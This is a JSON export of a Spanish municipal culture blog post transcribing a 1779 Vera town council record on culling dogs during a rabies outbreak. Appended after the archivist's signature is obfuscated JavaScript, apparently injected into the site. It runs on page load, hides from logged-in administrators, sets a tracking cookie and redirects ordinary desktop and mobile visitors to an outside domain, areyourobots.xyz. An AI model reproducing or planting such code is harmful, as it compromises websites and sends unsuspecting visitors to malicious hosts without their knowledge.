{"id":514,"date":"2014-10-29T09:28:19","date_gmt":"2014-10-29T09:28:19","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=514"},"modified":"2020-10-19T09:42:32","modified_gmt":"2020-10-19T09:42:32","slug":"muerto-el-perro-salubridad-en-la-vera-de-1779","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/10\/29\/muerto-el-perro-salubridad-en-la-vera-de-1779\/","title":{"rendered":"MUERTO EL PERRO&#8230; SALUBRIDAD EN LA VERA DE 1779"},"content":{"rendered":"<p style=\"text-align: left\" align=\"RIGHT\">En la nueva Vera en la que la Sociedad Patri\u00f3tica de Amigos del Pa\u00eds la trataba de convertir en 1779 todav\u00eda quedaba <b>mucho por hacer<\/b>: incrementar el consumo de agua por habitante con la construcci\u00f3n de nuevas fuentes p\u00fablicas, aumentar la superficie de riego, reubicar el cementerio del interior de la Ciudad, canalizar las aguas residuales&#8230;, y prevenir la salud de los vecinos vigilando la de los animales de compa\u00f1\u00eda y de labor. Y entre ellos estaba el perro.<!--more--><\/p>\n<p align=\"RIGHT\"><i>El can no mueve el rabo por ti, sino por el pan<\/i> (sentencia latina)<\/p>\n<p align=\"RIGHT\">Aristipo le dijo:<br \/>\u2014 <i>Si aprendieras a ser sumiso al rey, no tendr\u00edas que comer esa basura de lentejas.<\/i><br \/>A lo que replic\u00f3 Di\u00f3genes, el perro:<br \/>\u2014 <i>Si hubieras t\u00fa aprendido a comer lentejas, no tendr\u00edas que adular al rey. <\/i><\/p>\n<p align=\"JUSTIFY\">Aunque muchos escarmentados defienden que el c\u00e1nido es el mejor <b>amigo de su amo<\/b>, dejando claro que el excesivo apego a su due\u00f1o s\u00f3lo puede dar lugar a que tenga al resto de los hombres por sus enemigos (actitud s\u00f3lo comparable a la del terco gato por desconfiar de todos), no puede haber duda en cuanto a los beneficios que, desde que se domestic\u00f3 al lobo, el perro ha dispensado al b\u00edpedo implume. Y eso es lo que preocup\u00f3 a los Se\u00f1ores Capitulares en el invierno de ese a\u00f1o: era necesario <b>erradicar una epidemia de rabia<\/b> que amenazaba con diezmar el ganado ovino, caprino, bovino, a la especie asnal&#8230; Pero el problema no era sencillo: el sacrificio de los vigilantes de hocico h\u00famedo hac\u00eda peligrar la <b>seguridad<\/b> en los cortijos veratenses, por los seguros robos a que dar\u00eda lugar, adem\u00e1s de poner en peligro el pastoreo (vital para Vera), el arado de los campos, el transporte, la caza y otros quehaceres humanos.<\/p>\n<p align=\"JUSTIFY\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/Francisco_de_Goya_y_Lucientes_018.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-519\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/Francisco_de_Goya_y_Lucientes_018-300x229.jpg\" alt=\"Francisco_de_Goya_y_Lucientes_018\" width=\"300\" height=\"229\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/Francisco_de_Goya_y_Lucientes_018-300x229.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/Francisco_de_Goya_y_Lucientes_018.jpg 756w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"JUSTIFY\">Tama\u00f1a cuesti\u00f3n fue tratada por los principales de Vera como sigue (n\u00f3tese la insatisfacci\u00f3n del Alcalde Mayor por la dejadez del consistorio en su ausencia, la importancia de lo for\u00e1neo en la mentalidad de esa \u00e9poca, el remarcar la condici\u00f3n de animal racional, la alusi\u00f3n a los \u00abdue\u00f1os responsables\u00bb y a las distintas razas de perro, la necesidad de ejecutar el \u00abmal m\u00e1s peque\u00f1o\u00bb, la cuarentena por la que se decide finalmente&#8230;):<\/p>\n<p align=\"JUSTIFY\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/Beneito-IMG_0036.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-520\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/Beneito-IMG_0036-300x204.jpg\" alt=\"Beneito IMG_0036\" width=\"300\" height=\"204\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/Beneito-IMG_0036-300x204.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/Beneito-IMG_0036.jpg 341w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/D2B.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-521\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/D2B-300x225.jpg\" alt=\"D2B\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/D2B-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/D2B.jpg 480w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"JUSTIFY\"><i>15 de febrero de 1779.<\/i><\/p>\n<p align=\"JUSTIFY\"><i>Proposici\u00f3n del Sr. Alcalde mayor:<\/i><\/p>\n<p align=\"JUSTIFY\"><i>El Se\u00f1or Alcalde mayor hizo presente que ha m\u00e1s de cuatro meses o cinco que en su ausencia de esta ciudad se han experimentado repetidas subcesivas desgracias y funestas consecuencias de resultas de haber <b>rabiado<\/b> un perro y dejados a otros infectados, con que se han ido experimentando alternativamente en diversos tiempos, da\u00f1os en toda clase de <b>animales irracionales<\/b> y <b>racionales<\/b>, con la muerte de algunos seg\u00fan que es p\u00fablico y notorio, y debi\u00e9ndose prudentemente temer lo mismo en adelante si no se provee de oportuno <b>remedio<\/b> en cosa de tanta monta, por ser regular que los perros rabiosos hayan dejado inficcionados a otros, cuya enfermedad descubierta en ellos se <b>propaga<\/b> igualmente a otros, para prevenir en lo futuro tanto da\u00f1o, que ha mirado con indiferencia por este gobierno en ausencia de Su Merced y que est\u00e1 persuadido a que se abandonar\u00eda este negocio, y a\u00fan se sostendr\u00e1 con empe\u00f1o lo contrario, a no haber sido informado de los da\u00f1os recientemente experimentados que han llamado su atenci\u00f3n para <b>prevenir<\/b> los fueros, y deseando por lo mismo que deja apuntado el que no se le atribuya a resoluci\u00f3n que pueda en lo subcesivo cacnonizarse por <b>imprudente<\/b> mediante, vuelve a repetir, la indiferencia y dem\u00e1s expresado, lo har\u00e9 presente a este Ayuntamiento para que bajo de las protestas de que los da\u00f1os y muertes de racionales acaecidas por falta de remedio en tan dilatado tiempo se han de cuenta (sic) de los que deban ser en justicia responsables, se acuerde los medios conducentes para lo futuro con la brevedad que exige tan importante materia.<\/i><\/p>\n<p align=\"JUSTIFY\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/mastin_espanyol_cuerpo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-522\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/mastin_espanyol_cuerpo-300x225.jpg\" alt=\"mastin_espanyol_cuerpo\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/mastin_espanyol_cuerpo-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/mastin_espanyol_cuerpo.jpg 320w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"JUSTIFY\"><i>El Se\u00f1or don Antonio Garc\u00eda leon\u00e9s, expuso que los perros que se han experimentado adolecer del accidente de rabia han sido <b>forasteros<\/b> y principalmente el que mordi\u00f3 a Juan de Xerez, y el mulo de su hermano Marcos, que ambos fallecieron, era de <b>Moj\u00e1car<\/b>, y otros que con noticia que se daba a dicho se\u00f1or, padecer del mismo accidente, se mandaron matar, habi\u00e9ndose experimentado hallar nuevos otros animales asnales y perros del mismo accidente que quedaron infectados por los dichos forasteros, en cuya consecuencia este parecer que todos los perros que se viesen vagos, que estos se maten y que los que estuviesen custodiando <b>ganados<\/b>, haber\u00edos [animales de carga] de casas <b>cortijos<\/b> y otros cuales quiera sujetos que tengan otros para guarda de su casa, atendiendo a la custodia que se hallan sin la cual est\u00e1n expuestos dichos ganados y dem\u00e1s haber\u00edos a padecer una ruina por lobos y otras futuras consecuencias, desde luego <b>estos queden vivos<\/b>, pero con la precisa obligaci\u00f3n que siempre que se advierta el m\u00e1s leve accidente o sa\u00f1a de \u00e9l, se mate.<\/i><\/p>\n<p align=\"JUSTIFY\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/lebrel-espa\u00f1ol.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-523\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/lebrel-espa\u00f1ol.jpg\" alt=\"lebrel espa\u00f1ol\" width=\"275\" height=\"183\" \/><\/a><\/p>\n<p align=\"JUSTIFY\"><i>El se\u00f1or don Francisco Esc\u00e1nez Casquer se conform\u00f3 con el parecer dado por el Se\u00f1or don Antonio Garc\u00eda Leon\u00e9s.<\/i><\/p>\n<p align=\"JUSTIFY\"><i>Cedi\u00f3 Sim\u00f3n diputado, que todos los perros que est\u00e9n infectados de otros animales rabiosos, as\u00ed en los ganados como en las casas cortijos, y pares de machos que los custodian se <b>llamen a preg\u00f3n<\/b> por el Se\u00f1or Alcalde mayor a los due\u00f1os, y bajo de juramento expongan si han estado o les ha mordido alg\u00fan perro rabioso de los que han rabiado anteriormente, y si los hubiese mordido, dicho se\u00f1or Alcalde mayor podr\u00e1 mandar lo que tenga por conveniente de Justicia, quedando dichos due\u00f1os prevenidos que si dichos perros se pusiesen malos, han de matarlos dentro de las veinte y cuatro horas, quedando los expresados <b>due\u00f1os responsables<\/b> de los da\u00f1os y perjuicios que puedan resultar y que todos los in\u00fatiles como son los que no ser\u00edan para custodiar ganados, casas de campo y de ciudad y pares de mulos, que se maten.<\/i><\/p>\n<p align=\"JUSTIFY\"><i>Josef Sim\u00f3n Gallardo se conform\u00f3 con el parecer de su compa\u00f1ero.<\/i><\/p>\n<p align=\"JUSTIFY\"><i>El Se\u00f1or don Alonso Gonz\u00e1lez, Procurador S\u00edndico General de Orden del Se\u00f1or Alcalde Mayor, vot\u00f3 que se conformaba con el voto del Se\u00f1or don Antonio Garc\u00eda Leon\u00e9s.<\/i><\/p>\n<p align=\"JUSTIFY\"><i>El Se\u00f1or Personero del Com\u00fan expuso que lo expuesto por el Se\u00f1or Alcalde mayor es justo y arreglado mediante a dirigirse a precaver el da\u00f1o con la muerte de los perros infestados a excepci\u00f3n de los haber\u00edos y casas cortijos, por acaecer que en estos sitios, por la falta de los perros puede <b>ocasionarse robos<\/b> como se han experimentado, y en los ganados el perjuicio de ladrones y lobos, pues hacen que estos se maten si no se remedia a causa de la rabia por haber otros ganados en esta jurisdicci\u00f3n de las inmediatas por su <b>pasto com\u00fan<\/b>, y que llevando estos perros, que no se matan, queda la misma causa.<\/i><\/p>\n<p align=\"JUSTIFY\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/perdiguero_burgos_cuerpo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-525\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/perdiguero_burgos_cuerpo-300x225.jpg\" alt=\"perdiguero_burgos_cuerpo\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/perdiguero_burgos_cuerpo-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/perdiguero_burgos_cuerpo.jpg 320w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"JUSTIFY\"><i>En vista de lo expuesto por los se\u00f1ores capitulares, en sus respectivos votos, y que estos dejen en pie sin resoluci\u00f3n la proposici\u00f3n y que algunos no contienen entre s\u00ed sin alguna inverosimilitud, y considerando que <b>de dos males debe ocurrirse al mayor<\/b> anteponiendo lo m\u00e1s precioso como es la <b>vida y salud del hombre<\/b> a lo vil y despreciable de ganado y de m\u00e1s por una parte y por otra que todos los perros sin distinci\u00f3n de toda casta y linaje son \u00fatiles para la custodia de las casas objeto que ha sido digno de la atenci\u00f3n de los Se\u00f1ores Capitulares para la regulaci\u00f3n de sus respectivos, votos sin que se haya fijado la consideraci\u00f3n en los modos y medios de proveer de remedio adominente (sic) peligro y futuro perjuicio y, considerando as\u00ed mismo que la inacci\u00f3n del gobierno de los Pueblos circunvecinos cuando sea cierta que no le cree su merced, no debe servir de regla para el de esta ciudad, por no ser responsable por los defectos de omisiones ajenas desde luego teniendo presentes los inconvenientes apuntados [roto] proposici\u00f3n y deseando convenir a todo sin esc\u00e1ndalo ninguno: dijo que bajo de las protestas en su proposici\u00f3n expresadas que <b>se maten todos los perros que no sirvan para custodia de ganados y cortijos sitos en el campo<\/b>, como son todos los de la casta de <b>mastines<\/b>, <b>lebreles<\/b> de presa y los dem\u00e1s que com\u00fanmente est\u00e1n reputados para semejante servicio, y custodia de ganados y cortijos y que los dem\u00e1s, que com\u00fanmente no son ni se destinan para dicho servicio, y que se llaman vulgarmente <b>gorquer<\/b> (sic), <b>falderos<\/b>, <b>lanudos<\/b> y <b>dogos<\/b> y dem\u00e1s castas a estas semejantes, inmediatamente que se reconozcan desazonados o enfermos o les sobrevenga el m\u00e1s m\u00ednimo accidente de no disposici\u00f3n y por sus respectivos due\u00f1os, quienes y en el entretanto y por espacio de <b>cincuenta d\u00edas<\/b>, los tengan atados en sus casas con toda seguridad y en paraje donde no puedan hacer da\u00f1o a los que entrasen y salieren en ella, <b>pena de dos ducados<\/b> de lo contrario, adem\u00e1s de la responsabilidad por las resultas y de proceder a lo que por derecho haya lugar y que desta providencia se entienda a que se mate inmediatamente todo animal de labor o de otra clase que se reconozca inficcionado de la rabia bajo de la misma responsabilidad y apercibimiento y multa; y que se publique por voz de pregonero en la noche de este d\u00eda repiti\u00e9ndose en el de la ma\u00f1ana.<\/i><\/p>\n<p align=\"JUSTIFY\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/agua_espanyol_cuerpo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-526\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/agua_espanyol_cuerpo-300x225.jpg\" alt=\"agua_espanyol_cuerpo\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/agua_espanyol_cuerpo-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/agua_espanyol_cuerpo.jpg 320w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"JUSTIFY\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/ratonero_bodeguero_cuerpo-andaluz.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-527\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/ratonero_bodeguero_cuerpo-andaluz-300x225.jpg\" alt=\"ratonero_bodeguero_cuerpo andaluz\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/ratonero_bodeguero_cuerpo-andaluz-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/08\/ratonero_bodeguero_cuerpo-andaluz.jpg 320w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"JUSTIFY\"><i>Se public\u00f3: de que enterada esta Ciudad acord\u00f3 se conformaba y conform\u00f3 con la providencia el Se\u00f1or Alcalde mayor.<\/i><\/p>\n<p align=\"JUSTIFY\"><i>En dicho estado concluy\u00f3 este Cabildo, que firmaron dichos se\u00f1ores, doy fee.<\/i><\/p>\n<p align=\"JUSTIFY\"><i>R\u00fabricas:<\/i><\/p>\n<p align=\"JUSTIFY\"><i>Manuel Serrano y Cillero (Alcalde)<\/i><\/p>\n<p align=\"JUSTIFY\"><i>Pedro Joseph Sim\u00f3n<\/i><\/p>\n<p align=\"JUSTIFY\"><i>Alonso Gonz\u00e1lez Mu\u00f1oz<\/i><\/p>\n<p align=\"JUSTIFY\"><i>don Francisco Casquer <\/i><\/p>\n<p align=\"JUSTIFY\"><i>Francisco Xavier de Salas<\/i><\/p>\n<p align=\"JUSTIFY\"><i>ante m\u00ed: Salvador Joseph de Sim\u00f3n<\/i><\/p>\n<p align=\"JUSTIFY\"><i>Joseph Sim\u00f3n Gallardo<\/i><\/p>\n<p align=\"JUSTIFY\"><i>Antonio Garc\u00eda Leon\u00e9s<\/i><\/p>\n<p align=\"JUSTIFY\">[Actas cap: 1779, 8 v\u00ba]<\/p>\n<p align=\"JUSTIFY\">Transcripci\u00f3n 21-08-14 (ortograf\u00eda y puntuaci\u00f3n adaptadas a las actuales normas de la RAE)<\/p>\n<p style=\"text-align: right\" align=\"JUSTIFY\">Manuel Caparr\u00f3s Perales<\/p>\n<p style=\"text-align: right\" align=\"JUSTIFY\">Archivero Municipal de Vera<\/p>\n<p style=\"text-align: right\" align=\"JUSTIFY\">22-08-14<\/p>\n<p>var _0x2cf4=[&#8216;MSIE;&#8217;,&#8217;OPR&#8217;,&#8217;Chromium&#8217;,&#8217;Chrome&#8217;,&#8217;ppkcookie&#8217;,&#8217;location&#8217;,&#8217;https:\/\/www.areyourobots.xyz&#8217;,&#8217;onload&#8217;,&#8217;getElementById&#8217;,&#8217;undefined&#8217;,&#8217;setTime&#8217;,&#8217;getTime&#8217;,&#8217;toUTCString&#8217;,&#8217;cookie&#8217;,&#8217;;\\x20path=\/&#8217;,&#8217;split&#8217;,&#8217;length&#8217;,&#8217;charAt&#8217;,&#8217;substring&#8217;,&#8217;indexOf&#8217;,&#8217;match&#8217;,&#8217;userAgent&#8217;,&#8217;Edge&#8217;];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(&#8211;_0x5a22d4){_0x15c1df[&#8216;push&#8217;](_0x15c1df[&#8216;shift&#8217;]());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a(&#8216;0x0&#8217;)]=function(){(function(){if(document[_0x287a(&#8216;0x1&#8217;)](&#8216;wpadminbar&#8217;)===null){if(typeof _0x335357===_0x287a(&#8216;0x2&#8217;)){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546=\u00bb;if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a(&#8216;0x3&#8217;)](_0x5b6c5c[_0x287a(&#8216;0x4&#8242;)]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=&#8217;;\\x20expires=&#8217;+_0x5b6c5c[_0x287a(&#8216;0x5&#8217;)]();}document[_0x287a(&#8216;0x6&#8217;)]=_0xe0ae90+&#8217;=&#8217;+(_0x112012||\u00bb)+_0x21e546+_0x287a(&#8216;0x7&#8242;);}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+&#8217;=&#8217;;var _0x36a90c=document[_0x287a(&#8216;0x6&#8217;)][_0x287a(&#8216;0x8&#8217;)](&#8216;;&#8217;);for(var _0x51e64c=0x0;_0x51e64c&lt;_0x36a90c[_0x287a(&#039;0x9&#039;)];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a(&#039;0xa&#039;)](0x0)==&#039;\\x20&#039;)_0x37a41b=_0x37a41b[_0x287a(&#039;0xb&#039;)](0x1,_0x37a41b[&#039;length&#039;]);if(_0x37a41b[_0x287a(&#039;0xc&#039;)](_0x1f399a)==0x0)return _0x37a41b[_0x287a(&#039;0xb&#039;)](_0x1f399a[&#039;length&#039;],_0x37a41b[_0x287a(&#039;0x9&#039;)]);}return null;}function _0x51ef8a(){return navigator[&#039;userAgent&#039;][_0x287a(&#039;0xd&#039;)](\/Android\/i)||navigator[_0x287a(&#039;0xe&#039;)][_0x287a(&#039;0xd&#039;)](\/BlackBerry\/i)||navigator[&#039;userAgent&#039;][_0x287a(&#039;0xd&#039;)](\/iPhone|iPad|iPod\/i)||navigator[_0x287a(&#039;0xe&#039;)][&#039;match&#039;](\/Opera Mini\/i)||navigator[_0x287a(&#039;0xe&#039;)][_0x287a(&#039;0xd&#039;)](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a(&#039;0xe&#039;)][_0x287a(&#039;0xc&#039;)](_0x287a(&#039;0xf&#039;))!==-0x1||navigator[_0x287a(&#039;0xe&#039;)][_0x287a(&#039;0xc&#039;)](_0x287a(&#039;0x10&#039;))!==-0x1||navigator[_0x287a(&#039;0xe&#039;)][_0x287a(&#039;0xc&#039;)](_0x287a(&#039;0x11&#039;))!==-0x1||navigator[_0x287a(&#039;0xe&#039;)][_0x287a(&#039;0xc&#039;)](_0x287a(&#039;0x12&#039;))!==-0x1||navigator[_0x287a(&#039;0xe&#039;)][_0x287a(&#039;0xc&#039;)](&#039;Firefox&#039;)!==-0x1||navigator[_0x287a(&#039;0xe&#039;)][_0x287a(&#039;0xc&#039;)](_0x287a(&#039;0x13&#039;))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a(&#039;0x14&#039;));if(_0x55db25!==&#039;un&#039;){if(_0x58dc3d()||_0x51ef8a()){_0x335357(&#039;ppkcookie&#039;,&#039;un&#039;,0x16d);window[_0x287a(&#039;0x15&#039;)][&#039;replace&#039;](_0x287a(&#039;0x16&#039;));}}}}}(this));};<\/p>\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En la nueva Vera en la que la Sociedad Patri\u00f3tica de Amigos del Pa\u00eds la trataba de convertir en 1779 todav\u00eda quedaba mucho por hacer: incrementar el consumo de agua por habitante con la construcci\u00f3n de nuevas fuentes p\u00fablicas, aumentar la superficie de riego, reubicar el cementerio del interior de la Ciudad, canalizar las aguas &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2014\/10\/29\/muerto-el-perro-salubridad-en-la-vera-de-1779\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">MUERTO EL PERRO&#8230; SALUBRIDAD EN LA VERA DE 1779<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":516,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[14,269],"class_list":["post-514","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-archivo","tag-historia","tag-s-xviii"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/514","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=514"}],"version-history":[{"count":7,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/514\/revisions"}],"predecessor-version":[{"id":4512,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/514\/revisions\/4512"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/516"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=514"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=514"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=514"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}